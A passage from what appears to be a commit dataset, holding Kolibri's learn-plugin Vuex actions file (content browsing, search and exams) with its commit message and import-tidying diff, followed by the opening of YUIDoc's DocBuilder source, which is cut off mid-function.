content_id: contentId, item: itemId, }); const attributes = Object.assign({}, currentAttemptLog); attributes.user = store.state.core.session.user_id; attributes.examlog = store.state.examLog.id; // If the above findModel returned no matching model, then we can do // getModel to get the new model instead. if (!examAttemptLogModel) { examAttemptLogModel = ExamAttemptLogResource.createModel(attributes); } const promise = examAttemptLogModel.save(attributes); return promise.then( newExamAttemptLog => new Promise((resolve, reject) => { const log = Object.assign({}, newExamAttemptLog); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: log, }), }); const questionsAnswered = calcQuestionsAnswered(store.state.examAttemptLogs); store.dispatch('SET_QUESTIONS_ANSWERED', questionsAnswered); const examAttemptLogCollection = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: store.state.pageState.exam.id, }); // Add this attempt log to the Collection for future caching. examAttemptLogCollection.set(examAttemptLogModel); resolve(); }) ); } function closeExam(store) { const examLog = Object.assign({}, store.state.examLog); examLog.closed = true; return ExamLogResource.getModel(examLog.id).save(examLog).catch(error => { handleApiError(store, error); }); } export { setAndCheckChannels, contentState, showChannels, showTopicsChannel, showTopicsTopic, showTopicsContent, showContentUnavailable, triggerSearch, clearSearch, showSearch, showExam, showExamList, setAndSaveCurrentExamAttemptLog, closeExam, prepareLearnApp, updateContentNodeProgress, };
kolibri/plugins/learn/assets/src/state/actions/main.js
import { ContentNodeResource, ContentNodeProgressResource, SessionResource, UserExamResource, ExamLogResource, ExamAttemptLogResource, } from 'kolibri.resources'; import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; import { setChannelInfo, handleApiError } from 'kolibri.coreVue.vuex.actions'; import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; import { PageNames } from '../../constants'; import { samePageCheckGenerator } from 'kolibri.coreVue.vuex.actions'; import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; import { now } from 'kolibri.utils.serverClock'; import ConditionalPromise from 'kolibri.lib.conditionalPromise'; import router from 'kolibri.coreVue.router'; import seededShuffle from 'kolibri.lib.seededshuffle'; import prepareLearnApp from '../prepareLearnApp'; import { createTranslator } from 'kolibri.utils.i18n'; const name = 'topicTreeExplorationPageTitles'; const messages = { topicsForChannelPageTitle: 'Topics - { currentChannelTitle }', currentTopicForChannelPageTitle: '{ currentTopicTitle } - { currentChannelTitle }', currentContentForChannelPageTitle: '{ currentContentTitle } - { currentChannelTitle }', contentUnavailablePageTitle: 'Content Unavailable', searchPageTitle: 'Search', examsListPageTitle: 'Exams', currentExamPageTitle: '{ currentExamTitle} - { currentChannelTitle }', }; const translator = createTranslator(name, messages); /** * Vuex State Mappers * * The methods below help map data from * the API to state in the Vuex store */ function _crumbState(ancestors) { // skip the root node return ancestors.slice(1).map(ancestor => ({ id: ancestor.pk, title: ancestor.title, })); } function validateProgress(data) { if (!data.progress_fraction) { return 0.0; } else if (data.progress_fraction > 1.0) { return 1.0; } return data.progress_fraction; } function _topicState(data, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, description: data.description, thumbnail: thumbnail.storage_url, breadcrumbs: _crumbState(ancestors), parent: data.parent, kind: data.pk === data.channel_id ? ContentNodeKinds.CHANNEL : data.kind, progress, channel_id: data.channel_id, }; return state; } function contentState(data, nextContent, ancestors = []) { const progress = validateProgress(data); const thumbnail = data.files.find(file => file.thumbnail && file.available) || {}; const state = { id: data.pk, title: data.title, kind: data.kind, description: data.description, thumbnail: thumbnail.storage_url, available: data.available, files: data.files, progress, breadcrumbs: _crumbState(ancestors), content_id: data.content_id, next_content: nextContent, author: data.author, license: data.license, license_description: data.license_description, license_owner: data.license_owner, parent: data.parent, lang: data.lang, channel_id: data.channel_id, }; Object.assign(state, assessmentMetaDataState(data)); return state; } function _collectionState(data) { return data.map(item => { if (item.kind === ContentNodeKinds.TOPIC) { return _topicState(item); } return contentState(item); }); } function _examState(data) { const state = { id: data.id, title: data.title, channelId: data.channel_id, active: data.active, archive: data.archive, closed: data.closed, answerCount: data.answer_count, questionCount: data.question_count, score: data.score, }; return state; } function _examLoggingState(data) { const state = { id: data.id, closed: data.closed, }; return state; } /** * Cache utility functions * * These methods are used to manipulate client side cache to reduce requests */ function updateContentNodeProgress(channelId, contentId, progressFraction) { /* * Update the progress_fraction directly on the model object, so as to prevent having * to cache bust the model (and hence the entire collection), because some progress was * made on this ContentNode. */ const model = ContentNodeResource.getModel(contentId); model.set({ progress_fraction: progressFraction }); } function setAndCheckChannels(store) { return setChannelInfo(store).then(channels => { if (!channels.length) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); } return channels; }); } /** * Actions * * These methods are used to update client-side state */ function showChannels(store) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_ROOT); setAndCheckChannels(store).then( channels => { if (!channels.length) { return; } const channelRootIds = channels.map(channel => channel.root); ContentNodeResource.getCollection({ ids: channelRootIds }).fetch().then(rootNodes => { const pageState = { rootNodes: _collectionState(rootNodes), }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); }); }, error => { handleApiError(store, error); } ); } function showTopicsTopic(store, id, isRoot = false) { store.dispatch('CORE_SET_PAGE_LOADING', true); if (isRoot) { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); } else { store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_TOPIC); } const topicPromise = ContentNodeResource.getModel(id).fetch(); const childrenPromise = ContentNodeResource.getCollection({ parent: id, }).fetch(); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([topicPromise, childrenPromise, ancestorsPromise, channelsPromise]).only( samePageCheckGenerator(store), ([topic, children, ancestors]) => { const currentChannel = getChannelObject(store.state, topic.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { isRoot: isRoot, }; pageState.channel = currentChannel; pageState.topic = _topicState(topic, ancestors); const collection = _collectionState(children); pageState.contents = collection; store.dispatch('SET_PAGE_STATE', pageState); // Topics are expensive to compute progress for, so we lazily load progress for them. const subtopicIds = collection .filter(item => item.kind === ContentNodeKinds.TOPIC) .map(subtopic => subtopic.id); if (subtopicIds.length) { const topicProgressPromise = ContentNodeProgressResource.getCollection({ ids: subtopicIds, }).fetch(); topicProgressPromise.then(progressArray => { store.dispatch('SET_TOPIC_PROGRESS', progressArray); }); } store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); if (isRoot) { store.dispatch( 'CORE_SET_TITLE', translator.$tr('topicsForChannelPageTitle', { currentChannelTitle: currentChannel.title }) ); } else { store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentTopicForChannelPageTitle', { currentTopicTitle: pageState.topic.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } function showTopicsChannel(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CHANNEL); showTopicsTopic(store, id, true); } function showTopicsContent(store, id) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.TOPICS_CONTENT); const contentPromise = ContentNodeResource.getModel(id).fetch(); const nextContentPromise = ContentNodeResource.fetchNextContent(id); const channelsPromise = setChannelInfo(store); const ancestorsPromise = ContentNodeResource.fetchAncestors(id); ConditionalPromise.all([ contentPromise, channelsPromise, nextContentPromise, ancestorsPromise, ]).only( samePageCheckGenerator(store), ([content, channels, nextContent, ancestors]) => { const currentChannel = getChannelObject(store.state, content.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const pageState = { content: contentState(content, nextContent, ancestors), channel: currentChannel, }; store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentContentForChannelPageTitle', { currentContentTitle: pageState.content.title, currentChannelTitle: currentChannel.title, }) ); }, error => { handleApiError(store, error); } ); } function triggerSearch(store, searchTerm) { if (!searchTerm) { const searchState = { searchTerm, topics: [], contents: [], }; store.dispatch('SET_PAGE_STATE', searchState); return; } const contentCollection = ContentNodeResource.getPagedCollection({ search: searchTerm }); const searchResultsPromise = contentCollection.fetch(); searchResultsPromise .then(results => { const searchState = { searchTerm }; searchState.contents = _collectionState(results); store.dispatch('SET_PAGE_STATE', searchState); store.dispatch('CORE_SET_PAGE_LOADING', false); }) .catch(error => { handleApiError(store, error); }); } function clearSearch(store) { store.dispatch('SET_PAGE_STATE', { topics: [], contents: [], searchTerm: '', }); } function showContentUnavailable(store) { store.dispatch('SET_PAGE_NAME', PageNames.CONTENT_UNAVAILABLE); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('contentUnavailablePageTitle')); } function showSearch(store, searchTerm) { store.dispatch('SET_PAGE_NAME', PageNames.SEARCH); store.dispatch('SET_PAGE_STATE', {}); store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('searchPageTitle')); clearSearch(store); setAndCheckChannels(store).then(channels => { if (!channels.length) { return; } if (searchTerm) { triggerSearch(store, searchTerm); } else { store.dispatch('CORE_SET_PAGE_LOADING', false); } }); } function showExamList(store) { const userIsLoggedIn = isUserLoggedIn(store.state); store.dispatch('SET_PAGE_NAME', PageNames.EXAM_LIST); store.dispatch('CORE_SET_PAGE_LOADING', true); // if user is not logged in, this action is a noop if (!userIsLoggedIn) { store.dispatch('CORE_SET_PAGE_LOADING', false); return Promise.resolve(); } return UserExamResource.getCollection().fetch().only( samePageCheckGenerator(store), exams => { const pageState = {}; pageState.exams = exams.map(_examState); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch('CORE_SET_TITLE', translator.$tr('examsListPageTitle')); }, error => { handleApiError(store, error); } ); } function calcQuestionsAnswered(attemptLogs) { let questionsAnswered = 0; Object.keys(attemptLogs).forEach(key => { Object.keys(attemptLogs[key]).forEach(innerKey => { questionsAnswered += attemptLogs[key][innerKey].answer ? 1 : 0; }); }); return questionsAnswered; } function showExam(store, id, questionNumber) { if (store.state.pageName !== PageNames.EXAM) { store.dispatch('CORE_SET_PAGE_LOADING', true); store.dispatch('SET_PAGE_NAME', PageNames.EXAM); } if (!store.state.core.session.user_id) { store.dispatch('CORE_SET_ERROR', 'You must be logged in as a learner to view this page'); store.dispatch('CORE_SET_PAGE_LOADING', false); } else { questionNumber = Number(questionNumber); // eslint-disable-line no-param-reassign const examPromise = UserExamResource.getModel(id).fetch(); const examLogPromise = ExamLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); const examAttemptLogPromise = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: id, }).fetch(); ConditionalPromise.all([examPromise, examLogPromise, examAttemptLogPromise]).only( samePageCheckGenerator(store), ([exam, examLogs, examAttemptLogs]) => { const currentChannel = getChannelObject(store.state, exam.channel_id); if (!currentChannel) { router.replace({ name: PageNames.CONTENT_UNAVAILABLE }); return; } const attemptLogs = {}; if (store.state.core.session.user_id) { if (examLogs.length > 0 && examLogs.some(log => !log.closed)) { store.dispatch('SET_EXAM_LOG', _examLoggingState(examLogs.find(log => !log.closed))); } else { const examLogModel = ExamLogResource.createModel({ user: store.state.core.session.user_id, exam: id, closed: false, }); examLogModel.save().then(newExamLog => { store.dispatch('SET_EXAM_LOG', newExamLog); ExamLogResource.unCacheCollection({ user: store.state.core.session.user_id, exam: id, }); }); } // Sort through all the exam attempt logs retrieved and organize them into objects // keyed first by content_id and then item id under that. if (examAttemptLogs.length > 0) { examAttemptLogs.forEach(log => { if (!attemptLogs[log.content_id]) { attemptLogs[log.content_id] = {}; } attemptLogs[log.content_id][log.item] = Object.assign({}, log); }); } } const seed = exam.seed; const questionSources = exam.question_sources; // Create an array of objects with contentId and assessmentItemIndex // These will be used to select specific questions from the content node // The indices referred to shuffled positions in the content node's assessment_item_ids // property. // Wrap this all in a seededShuffle to give a consistent, repeatable shuffled order. const shuffledQuestions = seededShuffle.shuffle( createQuestionList(questionSources), seed, true ); if (!shuffledQuestions[questionNumber]) { // Illegal question number! handleError(store, `Question number ${questionNumber} is not valid for this exam`); } else { const contentPromise = ContentNodeResource.getCollection({ ids: questionSources.map(item => item.exercise_id), }).fetch(); contentPromise.only( samePageCheckGenerator(store), contentNodes => { const contentNodeMap = {}; contentNodes.forEach(node => { contentNodeMap[node.pk] = node; }); const questions = shuffledQuestions.map(question => ({ itemId: selectQuestionFromExercise( question.assessmentItemIndex, seed, contentNodeMap[question.contentId] ), contentId: question.contentId, })); if (questions.every(question => !question.itemId)) { // Exam is drawing solely on malformed exercise data, best to quit now handleError(store, `This exam has no valid questions`); } else { const itemId = questions[questionNumber].itemId; const channelId = exam.channel_id; const currentQuestion = questions[questionNumber]; const questionsAnswered = Math.max( store.state.pageState.questionsAnswered || 0, calcQuestionsAnswered(attemptLogs) ); const pageState = { exam: _examState(exam), itemId, questions, currentQuestion, questionNumber, content: contentState(contentNodeMap[questions[questionNumber].contentId]), channelId, questionsAnswered, }; if (!attemptLogs[currentQuestion.contentId]) { attemptLogs[currentQuestion.contentId] = {}; } if (!attemptLogs[currentQuestion.contentId][itemId]) { attemptLogs[currentQuestion.contentId][itemId] = { start_timestamp: now(), completion_timestamp: null, end_timestamp: null, item: itemId, complete: false, time_spent: 0, correct: 0, answer: null, simple_answer: '', interaction_history: [], hinted: false, channel_id: channelId, content_id: currentQuestion.contentId, }; } pageState.currentAttempt = attemptLogs[currentQuestion.contentId][itemId]; store.dispatch('SET_EXAM_ATTEMPT_LOGS', attemptLogs); store.dispatch('SET_PAGE_STATE', pageState); store.dispatch('CORE_SET_PAGE_LOADING', false); store.dispatch('CORE_SET_ERROR', null); store.dispatch( 'CORE_SET_TITLE', translator.$tr('currentExamPageTitle', { currentExamTitle: pageState.exam.title, currentChannelTitle: currentChannel.title, }) ); } }, error => { handleApiError(store, error); } ); } }, error => { handleApiError(store, error); } ); } } function setAndSaveCurrentExamAttemptLog(store, contentId, itemId, currentAttemptLog) { // As soon as this has happened, we should clear any previous cache for the // UserExamResource - as that data has now changed. UserExamResource.clearCache(); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: currentAttemptLog, }), }); const pageState = Object.assign(store.state.pageState); pageState.currentAttempt = currentAttemptLog; store.dispatch('SET_PAGE_STATE', pageState); // If a save has already been fired for this particular attempt log, // it may not have an id yet, so we can look for it by its uniquely // identifying fields, contentId and itemId. let examAttemptLogModel = ExamAttemptLogResource.findModel({ content_id: contentId, item: itemId, }); const attributes = Object.assign({}, currentAttemptLog); attributes.user = store.state.core.session.user_id; attributes.examlog = store.state.examLog.id; // If the above findModel returned no matching model, then we can do // getModel to get the new model instead. if (!examAttemptLogModel) { examAttemptLogModel = ExamAttemptLogResource.createModel(attributes); } const promise = examAttemptLogModel.save(attributes); return promise.then( newExamAttemptLog => new Promise((resolve, reject) => { const log = Object.assign({}, newExamAttemptLog); store.dispatch('SET_EXAM_ATTEMPT_LOGS', { // prettier-ignore [contentId]: ({ [itemId]: log, }), }); const questionsAnswered = calcQuestionsAnswered(store.state.examAttemptLogs); store.dispatch('SET_QUESTIONS_ANSWERED', questionsAnswered); const examAttemptLogCollection = ExamAttemptLogResource.getCollection({ user: store.state.core.session.user_id, exam: store.state.pageState.exam.id, }); // Add this attempt log to the Collection for future caching. examAttemptLogCollection.set(examAttemptLogModel); resolve(); }) ); } function closeExam(store) { const examLog = Object.assign({}, store.state.examLog); examLog.closed = true; return ExamLogResource.getModel(examLog.id).save(examLog).catch(error => { handleApiError(store, error); }); } export { setAndCheckChannels, contentState, showChannels, showTopicsChannel, showTopicsTopic, showTopicsContent, showContentUnavailable, triggerSearch, clearSearch, showSearch, showExam, showExamList, setAndSaveCurrentExamAttemptLog, closeExam, prepareLearnApp, updateContentNodeProgress, };
Bootstrap channel list when entering exams page
kolibri/plugins/learn/assets/src/state/actions/main.js
Bootstrap channel list when entering exams page
<ide><path>olibri/plugins/learn/assets/src/state/actions/main.js <ide> import { <ide> ContentNodeResource, <ide> ContentNodeProgressResource, <del> SessionResource, <ide> UserExamResource, <ide> ExamLogResource, <ide> ExamAttemptLogResource, <ide> } from 'kolibri.resources'; <ide> <ide> import { getChannelObject, isUserLoggedIn } from 'kolibri.coreVue.vuex.getters'; <del>import { setChannelInfo, handleApiError } from 'kolibri.coreVue.vuex.actions'; <add>import { <add> setChannelInfo, <add> handleApiError, <add> samePageCheckGenerator, <add>} from 'kolibri.coreVue.vuex.actions'; <ide> import { createQuestionList, selectQuestionFromExercise } from 'kolibri.utils.exams'; <ide> import { ContentNodeKinds } from 'kolibri.coreVue.vuex.constants'; <ide> import { PageNames } from '../../constants'; <del>import { samePageCheckGenerator } from 'kolibri.coreVue.vuex.actions'; <ide> import { assessmentMetaDataState } from 'kolibri.coreVue.vuex.mappers'; <ide> import { now } from 'kolibri.utils.serverClock'; <ide> <ide> user: store.state.core.session.user_id, <ide> exam: id, <ide> }).fetch(); <del> ConditionalPromise.all([examPromise, examLogPromise, examAttemptLogPromise]).only( <add> ConditionalPromise.all([ <add> examPromise, <add> examLogPromise, <add> examAttemptLogPromise, <add> setAndCheckChannels(store), <add> ]).only( <ide> samePageCheckGenerator(store), <ide> ([exam, examLogs, examAttemptLogs]) => { <ide> const currentChannel = getChannelObject(store.state, exam.channel_id);
JavaScript
bsd-3-clause
d9e8f2afa57168f2595e671cde67529fc56d0528
0
greyhwndz/yuidoc,mborman/yuidoc-asp,naver/auidoc,okuryu/yuidoc,Tetpay/yuidoc,regru/yuidoc,mixonic/yuidoc,mborman/yuidoc-asp,fireball-x/firedoc,naver/auidoc,mixonic/yuidoc,okuryu/yuidoc,greyhwndz/yuidoc,mborman/yuidoc-asp,regru/yuidoc,okuryu/yuidoc,mixonic/yuidoc,greyhwndz/yuidoc,fireball-x/firedoc,Tetpay/yuidoc,fireball-x/firedoc,naver/auidoc,regru/yuidoc
/* Copyright (c) 2011, Yahoo! Inc. All rights reserved. Code licensed under the BSD License: http://yuilibrary.com/license/ */ var MD = require("node-markdown").Markdown, fs = require('graceful-fs'), noop = function() {}, path = require('path'), DEFAULT_RETURN_TAGS = 'code|em|strong|span|a|pre|dl|dd|dt|ul|li|ol', TEMPLATE, /** * Takes a type string and converts it to a "First letter upper cased" type. e.g. `(string -> String, object -> Object)` * @method fixType * @private * @param {String} t The type string to convert * @return {String} The fixed string */ fixType = function(t) { var firstChar = t.charAt(0), upperFirstChar = firstChar.toUpperCase(); if (firstChar !== upperFirstChar) { return upperFirstChar + t.substring(1); } return t; }, /** * Wrapper around the Markdown parser so it can be normalized or even side stepped * @method markdown * @private * @param {String} md The Markdown string to parse * @param {Boolean} def Only allow default set of HTML tags * @param {Array} tags An array of tags to allow * @return {HTML} The rendered HTML */ markdown = function(md, def, tags) { html = MD(md, def, tags); return html; }; /** * Takes the `JSON` data from the `DocParser` class, creates and parses markdown and handlebars based templates to generate static HTML content * @class DocBuilder * @module yuidoc */ YUI.add('doc-builder', function(Y) { var print = function(items) { var out = '<ul>'; Y.each(items, function(i, k) { out += '<li>'; if (Y.Lang.isObject(i)) { if (!i.path) { out += k + '/' + print(i); } else { out += '<a href="../files/' + i.name + '.html">' + k + '</a>'; } } out += '</li>'; }); out += '</ul>'; return out; }; Y.Handlebars.registerHelper('buildFileTree', function(items, fn) { return print(items); }); var DEFAULT_THEME = themeDir = path.join(__dirname, '../', 'themes', 'default'); Y.DocBuilder = function(options, data) { this.options = options; if (options.themedir) { themeDir = options.themedir; } this.data = data; Y.log('Building..', 'info', 'builder'); this.files = 0; var self = this; Y.Handlebars.registerHelper('crossLink', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item); } return str; }); Y.Handlebars.registerHelper('crossLinkModule', function(item, fn) { var str = item; if (self.data.modules[item]) { str = '<a href="../modules/' + item + '.html">' + item + '</a>'; } return str; }); Y.Handlebars.registerHelper('crossLinkRaw', function(item, fn) { var str = ''; if (!item) { item = ''; } if (item.indexOf('|') > 0) { var parts = item.split('|'), p = []; Y.each(parts, function(i) { p.push(self._parseCrossLink.call(self, i, true)); }); str = p.join(' | '); } else { str = self._parseCrossLink.call(self, item, true); } return str; }); this.cacheTemplates = true; if (options.cacheTemplates === false) { this.cacheTemplates = false; } }; Y.DocBuilder.prototype = { _parseCrossLink: function(item, raw) { item = fixType(item); var self = this; var base = '../', baseName = item, newWin = false, className = 'crosslink'; item = baseItem = Y.Lang.trim(item.replace('{', '').replace('}', '')); //Remove Cruft item = item.replace('*', '').replace('[', '').replace(']', ''); var link = false, href; if (self.data.classes[item]) { link = true; } else { if (self.data.classes[item.replace('.', '')]) { link = true; item = item.replace('.', ''); } } if (self.options.externalData) { if (self.data.classes[item]) { if (self.data.classes[item].external) { href = self.data.classes[item].path; base = self.options.externalData.base; className += ' external'; newWin = true; link = true; } } } /* if (!link && self.options.externalData) { var d = self.options.externalData; if (d && d.classes[item]) { href = d.classes[item].path; base = d.base; className += ' external'; newWin = true; link = true; } } */ if (item === 'Object' || item === 'Array') { link = false; } if (!href) { href = path.join(base, 'classes', item + '.html'); if (base.match(/^https?:\/\//)) { href = base + path.join('classes', item + '.html'); } } if (!link && self.options.linkNatives) { if (self.NATIVES && self.NATIVES[item]) { href = self.NATIVES_LINKER(item); if (href) { className += ' external'; newWin = true; link = true; } } } if (link) { item = '<a href="' + href + '" class="' + className + '"' + ((newWin) ? ' target="_blank"' : '') + '>' + baseItem + '</a>'; } return (raw) ? href : item; }, NATIVES: { 'Array': 1, 'Boolean': 1, 'Date': 1, 'decodeURI': 1, 'decodeURIComponent': 1, 'encodeURI': 1, 'encodeURIComponent': 1, 'eval': 1, 'Error': 1, 'EvalError': 1, 'Function': 1, 'Infinity': 1, 'isFinite': 1, 'isNaN': 1, 'Math': 1, 'NaN': 1, 'Number': 1, 'Object': 1, 'parseFloat': 1, 'parseInt': 1, 'RangeError': 1, 'ReferenceError': 1, 'RegExp': 1, 'String': 1, 'SyntaxError': 1, 'TypeError': 1, 'undefined': 1, 'URIError': 1, 'HTMLElement': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLCollection': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'DocumentFragment': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/', 'HTMLDocument': 'https:/'+'/developer.mozilla.org/en/Document_Object_Model_(DOM)/' }, NATIVES_LINKER: function(name) { var url = 'https:/'+'/developer.mozilla.org/en/JavaScript/Reference/Global_Objects/'; if (this.NATIVES[name] !== 1) { url = this.NATIVES[name]; } return url + name; }, _mixExternal: function() { var self = this; Y.log('External data received, mixing', 'info', 'builder'); var exData = self.options.externalData; ['files', 'classes', 'modules'].forEach(function(k) { Y.each(exData[k], function(item, key) { item.external = true; var file = item.name; if (!item.file) { file = self.filterFileName(item.name); } item.path = exData.base + path.join(k, file + '.html'); self.data[k][key] = item; }); }); Y.each(exData.classitems, function(item) { item.external = true; item.path = exData.base + path.join('files', self.filterFileName(item.file) + '.html'); self.data.classitems.push(item); }); }, mixExternal: function(cb) { var self = this, info = self.options.external; if (!info) { cb(); return; } if (!info.merge) { info.merge = 'mix'; } if (!info.data) { Y.log('External config found but no data path defined, skipping import.', 'warn', 'builder'); cb(); return; } if (!Y.Lang.isArray(info.data)) { info.data = [ info.data ]; } Y.log('Importing external documentation data.', 'info', 'builder'); var stack = new Y.Parallel(); info.data.forEach(function(i) { var base; if (i.match(/^https?:\/\//)) { base = i.replace('data.json', ''); Y.use('io-base', stack.add(function() { Y.io(i, { on: { complete: stack.add(function(id, e) { var data = JSON.parse(e.responseText); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); }) } }); })); } else { base = path.dirname(path.resolve(i)); var data = Y.Files.getJSON(i); data.base = base; self.options.externalData = Y.mix(self.options.externalData || {}, data); } }); stack.done(function() { Y.log('Finished fetching remote data', 'info', 'builder'); self._mixExternal(); cb(); }); }, /** * The default tags to use in params descriptions (for Markdown). * @property defaultTags * @type String */ defaultReturnTags: DEFAULT_RETURN_TAGS, defaultTags: 'p|' + DEFAULT_RETURN_TAGS, /** * File counter * @property files * @type Number */ files: null, /** * Prep the meta data to be fed to Selleck * @method getProjectMeta * @return {Object} The project metadata */ _meta: null, getProjectMeta: function() { var obj = { meta: { yuiSeedUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/yui/yui-min.js', yuiGridsUrl: 'http://yui.yahooapis.com/3.5.0pr4/build/cssgrids/cssgrids-min.css' } }; if (!this._meta) { try { var meta; if (fs.existsSync(path.join(themeDir, 'theme.json'))) { meta = Y.Files.getJSON(path.join(themeDir, 'theme.json')); } else if (DEFAULT_THEME !== themeDir) { if (fs.existsSync(path.join(DEFAULT_THEME))) { meta = Y.Files.getJSON(path.join(DEFAULT_THEME, 'theme.json')); } } if (meta) { obj.meta = meta; this._meta = meta; } } catch (e) {} } else { obj.meta = this._meta; } Y.each(this.data.project, function(v, k) { var key = k.substring(0, 1).toUpperCase() + k.substring(1, k.length); obj.meta['project' + key] = v; }); return obj }, /** * Populate the meta data for classes * @method populateClasses * @param {Object} opts The original options * @return {Object} The modified options */ populateClasses: function(opts) { opts.meta.classes = []; Y.each(this.data.classes, function(v) { if (v.external) { return } opts.meta.classes.push({ displayName: v.name, name: v.name}); }); opts.meta.classes.sort(this.nameSort); return opts; }, /** * Populate the meta data for modules * @method populateModules * @param {Object} opts The original options * @return {Object} The modified options */ populateModules: function(opts) { var self = this; opts.meta.modules = []; opts.meta.allModules = []; Y.each(this.data.modules, function(v) { if (v.external) { return } opts.meta.allModules.push({ displayName: v.displayName || v.name, name: self.filterFileName(v.name), description: v.description }); if (!v.is_submodule) { var o = { displayName: v.displayName || v.name, name: self.filterFileName(v.name) }; if (v.submodules) { o.submodules = []; Y.each(v.submodules, function(i, k) { moddef = self.data.modules[k]; if (moddef) { o.submodules.push({ displayName: k, description: moddef.description }); } else { //Y.log('Submodule data missing: ' + k + ' for ' + v.name, 'warn', 'builder'); } }); o.submodules.sort(self.nameSort); } opts.meta.modules.push(o); } }); opts.meta.modules.sort(this.nameSort); opts.meta.allModules.sort(this.nameSort); return opts; }, /** * Populate the meta data for files * @method populateFiles * @param {Object} opts The original options * @return {Object} The modified options */ populateFiles: function(opts) { var self = this; opts.meta.files = []; Y.each(this.data.files, function(v) { if (v.external) { return } opts.meta.files.push({ displayName: v.name, name: self.filterFileName(v.name), path: v.path || v.name }); }); var tree = {}; var files = []; Y.each(this.data.files, function(v) { if (v.external) { return } files.push(v.name); }); files.sort(); Y.each(files, function(v) { var p = v.split('/'), par; p.forEach(function(i, k) { if (!par) { if (!tree[i]) { tree[i] = {}; } par = tree[i]; } else { if (!par[i]) { par[i] = {}; } if (k + 1 === p.length) { par[i] = { path: v, name: self.filterFileName(v) }; } par = par[i]; } }); }); opts.meta.fileTree = tree; return opts; }, addFoundAt: function(a) { var self = this; if (a.file && a.line && !self.options.nocode) { a.foundAt = '../files/' + self.filterFileName(a.file) + '.html#l' + a.line; if (a.path) { a.foundAt = a.path + '#l' + a.line; } } return a; }, /** * Augments the **DocParser** meta data to provide default values for certain keys as well as parses all descriptions * with the `Markdown Parser` * @method augmentData * @param {Object} o The object to recurse and augment * @return {Object} The augmented object */ augmentData: function(o) { var self = this; o = self.addFoundAt(o); Y.each(o, function(i, k1) { if (i && i.forEach) { Y.each(i, function(a, k) { if (!(a instanceof Object)) { return; } if (!a.type) { a.type = 'Object'; //Default type is Object } if (a.final === '') { a.final = true; } if (!a.description) { a.description = ' '; } else { a.description = markdown(a.description, true, self.defaultTags); } if (a.example) { a.example = markdown(a.example, true, self.defaultTags); } a = self.addFoundAt(a); Y.each(a, function(c, d) { if (c.forEach || (c instanceof Object)) { c = self.augmentData(c); a[d] = c; } }); o[k1][k] = a; }); } else if (i instanceof Object) { i = self.addFoundAt(i); Y.each(i, function(v, k) { if (k === 'final') { o[k1][k] = true; } if (k === 'description' || k === 'example') { if (k1 === 'return') { o[k1][k] = markdown(v, true, self.defaultReturnTags); } else if (v.forEach || (v instanceof Object)) { o[k1][k] = self.augmentData(v); } else { o[k1][k] = markdown(v, true, self.defaultTags); } } }); } else if (k1 === 'description' || k1 === 'example') { o[k1] = markdown(i, true, self.defaultTags); } }); return o; }, /** * Makes the default directories needed * @method makeDirs * @param {Callback} cb The callback to execute after it's completed */ makeDirs: function(cb) { var self = this; var dirs = ['classes', 'modules', 'files']; if (self.options.dumpview) { dirs.push('json'); } var writeRedirect = function(dir, file, cb) { path.exists(file, function(x) { if (x) { var out = path.join(dir, 'index.html'); fs.createReadStream(file).pipe(fs.createWriteStream(out)); } cb(); }); }; var defaultIndex = path.join(themeDir, 'assets', 'index.html'); var stack = new Y.Parallel(); Y.log('Making default directories: ' + dirs.join(','), 'info', 'builder'); dirs.forEach(function(d) { var dir = 